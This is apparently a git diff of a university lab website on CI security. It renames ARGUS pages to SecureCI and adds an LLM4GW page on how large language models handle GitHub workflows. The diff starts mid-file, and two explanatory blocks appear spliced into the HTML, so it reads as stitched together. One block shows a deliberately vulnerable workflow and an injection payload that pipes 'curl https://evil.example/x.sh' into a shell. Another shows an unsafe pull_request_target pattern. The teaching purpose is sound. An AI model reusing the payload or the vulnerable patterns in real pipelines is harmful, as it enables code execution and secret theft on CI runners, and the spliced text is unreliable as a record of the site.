+ LLM4GW is the first comprehensive study to assess how effective Large Language Models (LLMs) are for tasks related to GitHub workflows. While LLMs have shown effectiveness in software development tasks like coding and testing, GitHub workflows are distinct from regular code in terms of structure, semantics, and security properties.
+
+
+ We curated a dataset of around 400,000 workflows based on the ARGUS dataset, generated prompts with varying levels of detail, and fine-tuned three state-of-the-art LLMs: GPT-3.5, CodeLlama, and StarChat. We evaluated the performance of these LLMs, both off-the-shelf and fine-tuned, on five workflow-related tasks: workflow generation, defect detection (syntactic errors and code injection vulnerabilities), and defect repair. The evaluation encompassed different prompting modes (zero-shot, one-shot) and involved identifying the best-performing temperature value and prompt for each LLM and task.
+
+
+ The study revealed that, unlike regular code generation, LLMs require detailed prompts to generate the desired workflows, but these detailed prompts can lead to invalid workflows with syntactic errors. Additionally, the LLMs were found to produce workflows with code injection vulnerabilities. The research also highlights the need for novel LLM-assisted techniques, as the current LLMs were found to be ineffective at repairing workflow defects.
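+ For illustration (our sketch, not an example from the paper), the classic injection pattern such generated workflows can contain is an attacker-controlled event field interpolated directly into a run script:

```yaml
# Hypothetical vulnerable workflow: the issue title is attacker-controlled,
# and the ${{ }} expression is expanded into the shell script *before* it runs.
name: triage
on: issues
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - run: echo "New issue: ${{ github.event.issue.title }}"
```

An issue titled `"; curl https://evil.example/x.sh | sh; echo "` would execute arbitrary code on the runner. The standard remediation is to pass the value through an intermediate environment variable (`env:`) so the shell never sees the expanded expression.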
+
+ Our code is open-sourced on GitHub. Please check out the repository for more details.
+
+
Bibtex
+
+ @inproceedings{10.1145/3664476.3664497,
+ author = {Zhang, Xinyu and Muralee, Siddharth and Cherupattamoolayil, Sourag and Machiry, Aravind},
+ title = {On the Effectiveness of Large Language Models for GitHub Workflows},
+ year = {2024},
+ isbn = {9798400717185},
+ publisher = {Association for Computing Machinery},
+ address = {New York, NY, USA},
+ url = {https://doi.org/10.1145/3664476.3664497},
+ doi = {10.1145/3664476.3664497},
+ booktitle = {Proceedings of the 19th International Conference on Availability, Reliability and Security},
+ articleno = {32},
+ numpages = {14},
+ location = {Vienna, Austria},
+ series = {ARES '24}
+ }
+
+
+
+
+
+
+
+
+
+
+ LLM4GW | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
+
GitHub published a blog post about our findings and also mentioned our tool. We are grateful for their support throughout our research.
+
Our tool is open-sourced on GitHub. Please check out the repository for more details.
+
PoCs
+
+ We have developed PoCs for some randomly picked vulnerable workflows. The PoCs are currently restricted to individuals whose identities we can verify, to prevent any misuse. If you are interested in obtaining the PoCs, please follow the steps mentioned here. You can select the PoC option while filling out the form.
+
- We are delighted to share the ARGUS dataset and believe it will be a valuable resource for your research. However, to prevent any potential misuse, we kindly request that you fill out a request form to confirm your identity and outline the scope of your research. Once we have verified these details, we will provide you with the download link for the ARGUS dataset.
+ We are delighted to share our datasets and believe they will be valuable resources for your research. However, to prevent any potential misuse, we kindly request that you fill out a request form to confirm your identity and outline the scope of your research. Once we have verified these details, we will provide you with the download link for the datasets.
- To download the ARGUS dataset, you must agree with the items of the succeeding Disclaimer & Download Agreement. You should carefully read the following terms before submitting the ARGUS Dataset request form.
+ To download our datasets, you must agree to the terms of the following Disclaimer & Download Agreement. Please read these terms carefully before submitting the Dataset Request Form.
The ARGUS dataset was constructed and cross-checked by two experts in workflow security research. Due to potential misclassification caused by subjective factors, we cannot guarantee 100% accuracy for the samples in the dataset.
@@ -97,12 +98,12 @@
Disclaimer & Download Agreement
The dataset is intended for non-commercial research and/or personal use only. It must not be used for commercial or otherwise profitable purposes.
-
The ARGUS dataset should not be re-selled or re-distributed. Anyone who has obtained ARGUS should not share the dataset with others without the permission from our team.
+
The dataset must not be resold or redistributed. Anyone who has obtained the dataset must not share it with others without permission from our team.
-
+
@@ -145,7 +146,7 @@
Dataset Shared With
- ARGUS | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
+ SecureCI | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
diff --git a/file/LLM4GW.bib b/file/LLM4GW.bib
new file mode 100644
index 0000000..4bf927b
--- /dev/null
+++ b/file/LLM4GW.bib
@@ -0,0 +1,15 @@
+@inproceedings{10.1145/3664476.3664497,
+ author = {Zhang, Xinyu and Muralee, Siddharth and Cherupattamoolayil, Sourag and Machiry, Aravind},
+ title = {On the Effectiveness of Large Language Models for GitHub Workflows},
+ year = {2024},
+ isbn = {9798400717185},
+ publisher = {Association for Computing Machinery},
+ address = {New York, NY, USA},
+ url = {https://doi.org/10.1145/3664476.3664497},
+ doi = {10.1145/3664476.3664497},
+ booktitle = {Proceedings of the 19th International Conference on Availability, Reliability and Security},
+ articleno = {32},
+ numpages = {14},
+ location = {Vienna, Austria},
+ series = {ARES '24}
+}
\ No newline at end of file
diff --git a/img/githublogo.png b/img/githublogo.png
new file mode 100644
index 0000000..a8376fa
Binary files /dev/null and b/img/githublogo.png differ
diff --git a/index.html b/index.html
index a80f1bc..da3c5f4 100644
--- a/index.html
+++ b/index.html
@@ -36,49 +36,64 @@
-
-
-
-
ARGUS Overview
-
-
- ARGUS is a groundbreaking static taint analysis system specifically designed to identify code injection vulnerabilities in GitHub Actions. It is the first of its kind, offering a unique approach to securing Continuous Integration/Continuous Deployment (CI/CD) pipelines.
-
-
- The system operates by tracking the flow of untrusted data across workflows and their associated actions, thereby identifying potential vulnerabilities. ARGUS has been meticulously tested on a large scale, analyzing over 2.7 million workflows and more than 31,000 actions. The results of this evaluation revealed critical code injection vulnerabilities in thousands of workflows and actions, highlighting the pervasive nature of such vulnerabilities in the GitHub Actions ecosystem.
-
-
- ARGUS not only outperforms existing pattern-based vulnerability scanners but also underscores the necessity of taint analysis for effective vulnerability detection. The development and implementation of ARGUS represent a significant stride towards enhancing the security of GitHub Actions and CI/CD pipelines at large.
-
-
-
Github's Blog
-
- GitHub published a blog post about our findings and also mentioned our tool. We are grateful for the support provided by them throughout our research.
-
-
Code
-
- Our tool is opensourced on GitHub. Please check out the repository for more details.
-
-
Bibtex
-
- @inproceedings{muralee2023Argus,
- title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
- author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
- A. Kapravelos, A. Machiry},
- booktitle={32st USENIX Security Symposium (USENIX Security 23)},
- year={2023},
- }
-
-
-
-
-
-
+
+
+
+
Overview
+
+
+ Continuous Integration (CI) has become essential to the modern software development cycle. Developers engineer CI scripts, commonly called workflows or pipelines, to automate most software maintenance tasks, such as testing and deployment.
+
+
+ Developers frequently misconfigure workflows, resulting in severe security issues that can have devastating consequences, including supply-chain attacks. The extreme diversity of CI platforms and their supported features further exacerbates the problem, making it challenging to uniformly specify and verify security properties across different CI platforms. In this area, we aim to address the problem by defining the desired security properties of a workflow and developing platform-independent techniques to verify and enforce them.
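+ As one concrete, illustrative example of such a misconfiguration (ours, not taken from the site): the `pull_request_target` trigger runs with the base repository's secrets and a write-scoped token, so checking out and executing untrusted pull-request code under that trigger is a well-known vulnerable pattern.

```yaml
# UNSAFE (illustrative): pull_request_target grants secrets and write
# permissions, but this job checks out and runs the untrusted PR's code.
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm install && npm test   # executes attacker-controlled scripts

# SAFER: use the pull_request trigger (read-only token, no secrets by
# default) for anything that executes PR code, and pin third-party
# actions to a full commit SHA rather than a mutable tag.
```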
+
+
+
+
+
+
+
+
+
Projects
+
+
+
+
+
ARGUS
+
+ ARGUS is a groundbreaking static taint analysis system specifically designed to identify code injection vulnerabilities in GitHub Actions. It is the first of its kind, offering a unique approach to securing Continuous Integration/Continuous Deployment (CI/CD) pipelines.
+
- We are greatful to the following sources for funding this project.
+ We are grateful to the following sources for funding the projects.
@@ -121,7 +136,7 @@
Funding
- ARGUS | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
+ SecureCI | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
\ No newline at end of file
diff --git a/poc.html b/poc.html
index 790b943..292c7f1 100644
--- a/poc.html
+++ b/poc.html
@@ -63,7 +63,7 @@
- ARGUS | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University
+ SecureCI | PurS3 Lab at Purdue University | PurSec Lab at Purdue University | WSPR Lab at North Carolina State University